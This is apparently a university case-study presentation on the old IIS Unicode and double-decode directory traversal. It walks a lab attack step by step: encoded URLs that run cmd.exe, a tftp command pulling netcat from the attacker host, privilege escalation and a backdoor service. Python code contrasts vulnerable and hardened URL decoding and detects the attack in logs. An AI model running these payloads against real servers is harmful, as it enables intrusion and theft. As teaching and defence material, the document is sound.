A Case Study in Software Exploitation
The Unicode Directory Traversal Vulnerability
(As described in Microsoft Security Bulletin MS00-078)
By: Peter Oswald
Flaw exists in IIS (Internet Information Services)
• Microsoft's flagship web server software
• Ships with Windows 2000 (and, for NT 4, with the NT 4 Option Pack) but is not installed by default on all Windows NT/2000 installations
• Is installed by default on Windows NT/2000 Server installations
Affected Versions of Windows
• Microsoft NT 4 Server with IIS
• Microsoft NT 4 Workstation with IIS
• Microsoft NT 4 Server and Workstation SP1 with IIS
• Microsoft NT 4 Server and Workstation SP2 with IIS
• Microsoft NT 4 Server and Workstation SP3 with IIS
• Microsoft NT 4 Server and Workstation SP4 with IIS
• Microsoft NT 4 Server and Workstation SP5 with IIS
• Microsoft NT 4 Server and Workstation SP6 with IIS
• Microsoft NT 4 Server and Workstation SP6a with IIS
• Microsoft Windows 2000 Professional
• Microsoft Windows 2000 Professional SP1
• Microsoft Windows 2000 Professional SP2
• Microsoft Windows 2000
• Microsoft Windows 2000 SP1
• Microsoft Windows 2000 SP2
• Microsoft Windows 2000 Server
• Microsoft Windows 2000 Server SP1
• Microsoft Windows 2000 Server SP2
• Microsoft Windows 2000 Advanced Server
• Microsoft Windows 2000 Advanced Server SP1
• Microsoft Windows 2000 Advanced Server SP2
• Microsoft Windows 2000 Datacenter Server
• Microsoft Windows 2000 Datacenter Server SP1
• Microsoft Windows 2000 Datacenter Server SP2
• Microsoft Windows 98 w/ Personal Web Server 4
PATCHED ON October 17, 2000 (the MS00-078 release date)
Unicode
• Essentially, Unicode is a single character set that covers all of the world's written languages. On the web it is normally carried as UTF-8, where one character can occupy several bytes.
• IIS checked the request path for ".." before it had finished decoding it. Characters such as "/" or "\" could be supplied in an alternate encoding that the traversal check did not recognise as a separator but that IIS decoded afterwards, so the check was bypassed. In the MS00-078 case the alternate encoding was an overlong UTF-8 sequence: %c0%af for "/" and %c1%9c for "\".
• The requests in the demonstration below use %255c instead: a doubly URL-encoded backslash (%25 decodes to "%", then %5c decodes to "\"). That is the closely related "superfluous decode" bug in IIS (MS01-026, patched May 2001); the mechanism, the exploitation and the result are the same, so the same walkthrough applies to both.
Standard Directory Traversing
• As many of you know, ".." names the parent directory in MS-DOS and Windows, so "cd .." moves up one level; "..\.." moves up two directories. A web server that lets ".." escape the directory it serves from is said to have a directory traversal flaw.
The IIS "scripts" directory
• IIS provides a "scripts" virtual directory (usually located in \Inetpub\scripts) which is used to allow easy execution of CGI scripts.
• By default it allows any .exe file in the scripts directory to be executed; however, all scripts/executables run from within the scripts directory run under the restricted anonymous web account "IUSR_<machinename>", which is a member of the local group "Guests" (minimal permissions).
IIS Scripts Directory + Unicode Vulnerability + Knowing how to Traverse =
• An attacker can now use a web browser to traverse up from the \Inetpub\scripts directory to the root of the drive and run files anywhere on the system as if they were in the scripts directory.
• This allowed the contents of directories to be read, and programs to be executed, with the permissions of a guest account.
Environment Setup
• Attacker's machine: 192.168.0.7 (Windows XP Professional)
• Router between the two hosts
• Vulnerable machine: 192.168.0.16 (Windows 2000 Server)
Example: using Internet Explorer to view the hard-drive contents
http://192.168.0.16/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir%20C:\
%255c is a doubly URL-encoded "\" (%25 decodes to "%", then %5c decodes to "\"); IIS performs that second decode after its ".." check has already run, so the check never sees a separator.
The path therefore resolves as \Inetpub\scripts\..\..\winnt\system32\cmd.exe = \winnt\system32\cmd.exe. Everything after "?" is handed to cmd.exe as its command line (/c dir C:\), and the output comes back as the HTTP response body.
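The decode-order mistake behind the request above, as an added example that is not code from the original slides: a Python model of the vulnerable IIS behaviour (check for ".." after one decode, then decode again and accept overlong UTF-8) beside a hardened version that decodes exactly once, rejects malformed UTF-8, canonicalises, and only then confines the result. The directory layout (/Inetpub/scripts) is taken from the slides; the function names and the use of "/" as separator are my assumptions for the demo, not IIS internals.

```python
"""Model of the IIS decode-order bug (added example; not from the slides).

iis_like_resolve() runs the ".." check after one decode but before the second
decode and the lenient UTF-8 conversion, as IIS 4/5 did.  safe_resolve()
decodes exactly once, rejects malformed UTF-8, canonicalises, and only then
checks that the result is still inside the scripts directory.  Paths use "/"
throughout for portability; the directory layout is assumed from the slides.
"""
from __future__ import annotations

import posixpath
from urllib.parse import unquote_to_bytes

SCRIPTS_DIR = "/Inetpub/scripts"   # assumed: where the /scripts virtual dir maps
VIRTUAL = "/scripts/"


def lenient_utf8(raw: bytes) -> str:
    """Decode 2-byte UTF-8 sequences without rejecting overlong forms.

    A strict decoder refuses 0xC0 0xAF; this one turns it into "/", which is
    the behaviour the MS00-078 bug depended on.  Other bytes pass through.
    """
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def iis_like_resolve(url_path: str) -> tuple[str | None, str]:
    """Vulnerable order: decode, check, decode again, then map to disk."""
    once = unquote_to_bytes(url_path)               # %25 -> "%", %c0%af -> c0 af
    if b"../" in once or b"..\\" in once:           # traversal check, run too early
        return None, "blocked"
    twice = unquote_to_bytes(once)                  # superfluous decode: %5c -> "\"
    text = lenient_utf8(twice).replace("\\", "/")   # overlong c0 af -> "/"
    if not text.startswith(VIRTUAL):
        return None, "blocked"
    fs = posixpath.normpath(SCRIPTS_DIR + text[len(VIRTUAL) - 1:])
    return fs, "allowed"                            # may now lie outside SCRIPTS_DIR


def safe_resolve(url_path: str) -> tuple[str | None, str]:
    """Hardened order: decode once, validate, canonicalise, then confine."""
    raw = unquote_to_bytes(url_path)
    try:
        text = raw.decode("utf-8")                  # strict: overlong forms raise
    except UnicodeDecodeError:
        return None, "rejected: invalid UTF-8"
    if not text.startswith(VIRTUAL):
        return None, "rejected: not under /scripts"
    fs = posixpath.normpath(SCRIPTS_DIR + text[len(VIRTUAL) - 1:].replace("\\", "/"))
    if fs != SCRIPTS_DIR and not fs.startswith(SCRIPTS_DIR + "/"):
        return None, "rejected: escapes scripts directory"
    return fs, "allowed"


if __name__ == "__main__":
    for req in ("/scripts/..%255c..%255cwinnt/system32/cmd.exe",    # double decode
                "/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe",  # overlong UTF-8
                "/scripts/../../winnt/system32/cmd.exe",            # plain traversal
                "/scripts/nc.exe"):
        print(f"{req}\n  vulnerable: {iis_like_resolve(req)}\n  hardened:   {safe_resolve(req)}")
```

Run stand-alone, the vulnerable model maps both encoded requests to /winnt/system32/cmd.exe while blocking the plain "../" form, which is exactly the gap the slides exploit; the hardened version treats "..%5c.." as an ordinary (nonexistent) file name inside the scripts directory and refuses the overlong bytes outright. The general rule it demonstrates is: never run an authorisation check on a representation that will be transformed again before use.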
What's in the financial folder?
http://192.168.0.16/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir%20C:\financial
What's in financial.txt?
http://192.168.0.16/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+type%20C:\financial\financial.txt
We can read files and browse directories, but how to get a shell?
• We'll use TFTP.EXE (the Trivial File Transfer Protocol client), which comes standard with all Windows NT/2000/XP installations, to upload Netcat (a popular tool briefly discussed by guest speaker Adam Conover). TFTP is convenient here because the client is already on the target and the protocol needs no authentication.
• Netcat will allow us to bind an instance of cmd.exe (command prompt) to a socket.
TFTP Upload
• We set up a TFTP server on the attacking machine (192.168.0.7) and upload Netcat (nc.exe) to the vulnerable machine (192.168.0.16). The -i switch selects binary (octet) transfer mode, which an .exe requires.
http://192.168.0.16/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+tftp -i 192.168.0.7 get nc.exe C:\Inetpub\scripts\nc.exe
TFTP Server running on Attacker's Machine
Execute NC (Netcat) to listen on port 666
http://192.168.0.16/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+C:\Inetpub\scripts\nc.exe -l
Telnet into vulnerable machine on port 666
We've already got a shell, but it runs as the IUSR account (a Guest); we want Administrator or SYSTEM privileges, so we use a local privilege escalation exploit.
• Microsoft Security Bulletin MS02-024 - Authentication Flaw in Windows Debugger can Lead to Elevated Privileges (Q320206)
• Program that utilizes this vulnerability: DebPloit (ERUNASX.DLL + ERUNASX.EXE), created by Radim "EliCZ" Picha
• We'll use ERUNASX to run our backdoor and thereby elevate it to SYSTEM.
Backdoor: WinShell v5.0
• Will install a service called "WinShell" that starts every time the computer is booted. It listens on port 5277 and provides a variety of functions.
Upload ERUNASX.EXE, ERUNASX.DLL, and WinShell via TFTP
Now execute WinShell (server.exe) using ERUNASX
Telnet into port 5277
WinShell is now installed as a service running with SYSTEM privileges, giving us complete access to the now fully compromised system.
Conclusion
• Since the attacker now has SYSTEM privileges, he can delete the web server logs, event logs, and other evidence that would be useful for forensics.
• The attacker can dump the password 'database' and obtain all of the user accounts and password hashes.
• The attacker can use the machine to launch attacks against other machines, etc.
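Because the first thing a SYSTEM-level intruder does is clear the logs, the web logs should leave the box as they are written, and someone should be reading them. What to read them for is shown by this added example, which is not part of the original slides: a small detector run over constructed IIS W3C extended log lines (IIS 5 default field order). The sample lines, the field layout and the signature list are my assumptions for the demo; IIS records cs-uri-stem as the client sent it, so the encoded forms are visible in the log.

```python
"""Detector for the traversal requests in this case study (added example;
not from the slides).  Runs over constructed IIS W3C extended log lines in the
IIS 5 default field order; the sample lines below are made up for the demo.
"""
from __future__ import annotations

import re
from urllib.parse import unquote, unquote_to_bytes

# Overlong UTF-8 forms of the two path separators (MS00-078).  Only these two
# are mapped; the point is to see what IIS executed, not to be a full decoder.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}

# Constructed sample: three attack requests from the lab attacker, two benign ones.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-04-10 21:03:11 192.168.0.7 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir%20C:\\ 200
2002-04-10 21:03:40 192.168.0.7 GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe /c+dir%20C:\\financial 200
2002-04-10 21:04:02 192.168.0.7 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+tftp+-i+192.168.0.7+get+nc.exe 200
2002-04-10 21:05:15 192.168.0.22 GET /default.asp - 200
2002-04-10 21:05:20 192.168.0.22 GET /scripts/hello.exe name=x 200
"""


def canonical(stem: str) -> str:
    """Reproduce what IIS ended up executing: decode twice, map the overlong
    separators, fold backslash to "/", lower-case."""
    raw = stem.encode("latin-1", errors="replace")
    for _ in range(2):                       # IIS decoded twice; mirror that
        raw = unquote_to_bytes(raw)
    for enc, plain in OVERLONG.items():
        raw = raw.replace(enc, plain)
    return raw.decode("latin-1").replace("\\", "/").lower()


def classify(stem: str, query: str) -> list[str]:
    """Return the reasons a request looks like this attack (empty = clean)."""
    reasons = []
    path = canonical(stem)
    if "/../" in path or path.startswith("../"):
        reasons.append("parent-directory traversal after decoding")
    if "cmd.exe" in path:
        reasons.append("cmd.exe reached through the web server")
    if re.search(r"%25|%c0%af|%c1%9c", stem, re.IGNORECASE):
        reasons.append("double- or overlong-encoded separator in raw URI")
    cmd = unquote(query.replace("+", " ")).lower()
    if re.search(r"\btftp\b|\bnc\.exe\b", cmd):
        reasons.append("file-transfer or netcat command in query string")
    return reasons


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, raw stem, reasons) for every flagged request."""
    hits = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        _date, _time, cip, _method, stem, query, _status = fields[:7]
        reasons = classify(stem, query)
        if reasons:
            hits.append((cip, stem, reasons))
    return hits


if __name__ == "__main__":
    for cip, stem, reasons in scan_log(SAMPLE_LOG):
        print(f"{cip} {stem}\n    " + "\n    ".join(reasons))
```

The decoded-path checks catch both encodings the slides discuss, and the raw-URI check fires even when the target path is not cmd.exe, which is useful because the same traversal serves to read arbitrary files. A status of 200 on such a request means the server obeyed it; a 404 after the patch is applied is the expected result.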
QUESTIONS?
http://triton.towson.edu/~poswal1/presentation.ppt
http://triton.towson.edu/~poswal1/paper.doc
Since we are ethical...
• We'll patch the server so nobody else can come in the same way we did:
Compromised system reboots and is no longer vulnerable; the same request that listed C:\ earlier now fails:
http://192.168.0.16/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir%20C:\
